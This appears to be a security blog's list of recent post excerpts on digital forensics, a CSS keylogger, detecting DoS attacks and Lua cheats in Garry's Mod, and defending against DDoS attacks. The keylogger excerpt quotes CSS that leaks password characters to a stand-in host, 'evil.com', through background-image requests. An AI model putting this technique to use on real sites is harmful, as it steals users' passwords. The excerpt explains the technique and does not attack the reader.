Recent Posts
Problems of Digital Forensics
The main goal of digital forensics is the extraction of data from electronic evidence and its subsequent analysis and processing into usable information. A major challenge lies in the flexibilization…
Better solution for CSS keylogging
The described keylogger is avaliable on my GitHub. How it works A primitive approach is a one-to-one mapping between characters and selectors: input[type="password"][value$="a"] { background-image: url("http://evil.com/?key=a"); } input[type="password"][value$="b"] { background-image:…
Detect DoS attacks in Garry’s Mod
The code discussed in this post is part of my open source anticheat and can be found here. In the game Garry's Mod, client and server can communicate via Netmessages.…
A method to detect Lua cheats
The code I wrote for this article can be found here. When detecting cheats in the game Garry’s Mod you have countless options. Suppose we want to detect a known…
Defending a nasty amplified DDoS attack
Earlier this year, in response to some previous DDoS attacks on a Garry's Mod server, I developed a fully automated script to detect "anomalies" in traffic, create a tcpdump for…
Defense against a ridiculously bad DDoS attack
After I discussed an earlier DDoS attack this year there had been another interesting attack. However, this time it is such a bad attack that I wonder how an advertised…